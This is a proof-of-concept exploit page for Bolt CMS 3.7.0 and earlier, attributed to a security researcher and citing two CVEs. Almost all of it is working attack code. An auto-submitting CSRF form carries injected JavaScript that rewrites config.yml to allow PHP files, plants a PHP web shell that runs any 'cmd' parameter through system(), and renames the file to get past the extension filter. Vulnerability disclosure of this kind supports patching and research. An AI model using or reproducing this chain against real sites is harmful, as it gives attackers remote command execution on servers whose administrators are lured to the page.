SA20200324_boltcms_csrf_to_rce.html

<!--
Vendor: Bolt CMS
Version: <= 3.7.0
CVE: CVE-2020-4040, CVE-2020-4041
Vulnerabilities: CSRF, XSS, RCE

Written by Sivanesh Ashok | @sivaneshashok | stazot.com

For more details, visit https://stazot.com

This is an RCE poc for Bolt CMS <= 3.7.0. When the admin of Bolt CMS visits the page that hosts this code, backdoor.php gets uploaded and can be used as
http://targetbolt.site/files/backdoor.php?cmd={insert_command_here}
-->

<html>
<body>
<!-- change http://localhost to the target domain -->
<form id="csrfform" method="POST" action="http://localhost/preview/page">
<input type=hidden name="contenttype" value="pages">
<input type=hidden name="title" value="Preview Page">
<input type=hidden name="slug" value="previewpage1">
<input type=hidden name="teaser" value="This is just a preview page">
<textarea type=hidden name="body">
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/3.1.1/jquery.min.js"></script>
<!-- javascript exploit starts here -->
<script>
// BoltCMS <= 3.7.0 RCE
// Written by Sivanesh Ashok | @sivaneshashok | stazot.com

// change "http://localhost" to the respective Bolt CMS domain
var target = 'http://localhost';

//change "/bolt" to your admin dashboard
var admin_url = '/bolt';

// edit config.yml to add php to acceptable file types
$.get(target+admin_url+'/file/edit/config/config.yml', function( my_var0 ) {

	var tokenobj0 = $(my_var0).find('#file_edit__token');
	var configfile = $(my_var0).find("#file_edit_contents")[0].defaultValue;
	var extensionsline = configfile.match("accept_file_types: (.*)]");
	var editedconfigfile = configfile.replace(extensionsline[0], "accept_file_types: "+extensionsline[1]+", php ]");

	$.ajax({
		type: 'POST',
		url: target+admin_url+'/file/edit/config/config.yml?returnto=ajax',
		data: {
			'file_edit[_token]':tokenobj0[0].value,
			'file_edit[contents]':editedconfigfile,
			'file_edit[save]':'undefined'
		}
	});
}, 'html');

$.ajaxSetup({async: false});

// create backdoor.txt
// change the name backdoor.txt below if you think that it could be present already
$.get(target+admin_url+"/files", function( my_var1 ) {

	var tokenobj1 = $(my_var1).find(".dropdown-menu.pull-right.hidden-xs").first().find("li:first-child").find("a:first-child").data().action.slice(22,-2).split(', ')[3].slice(1,-1);

	$.ajax({
		type: 'POST',
		url: target+'/async/file/create',
		data: {
			'filename': 'backdoor.txt',
			'parentPath': '',
			'namespace': 'files',
			'token': tokenobj1
		}
	});
}, 'html');

// edit backdoor.txt
$.get(target+admin_url+"/file/edit/files/backdoor.txt", function( my_var2 ) {

	var tokenobj2 = $(my_var2).find("#file_edit__token")[0].defaultValue;

	$.ajax({
		type: 'POST',
		url: target+admin_url+'/file/edit/files/backdoor.txt?returnto=ajax',
		data: {
			'file_edit[_token]': tokenobj2,
			'file_edit[contents]': `<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>`,
			'file_edit[save]': 'undefined'
		}
	});
}, 'html');

// rename backdoor.txt to backdoor.php\.
$.get(target+admin_url+"/files", function( my_var3 ) {

	var tokenobj3 = $(my_var3).find(".dropdown-menu.pull-right.hidden-xs").first().find("li:first-child").find("a:first-child").data().action.slice(22,-2).split(', ')[3].slice(1,-1);

	$.ajax({
		type: 'POST',
		url: target+'/async/file/rename',
		data: {
			'namespace': 'files',
			'parent': '',
			'oldname': 'backdoor.txt',
			'newname': 'backdoor.php\\.',
			'token': tokenobj3
		}
	});
}, 'html');
</script>
<!-- javascript exploit ends here -->
</textarea>
<input type=hidden name="id" value="1337">
<input type=submit value=submit id="submitbutton">
</form>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/3.1.1/jquery.min.js"></script>
<script type="text/javascript">
$(function() {
    $('#submitbutton').click();
});
</script>
</body>
</html>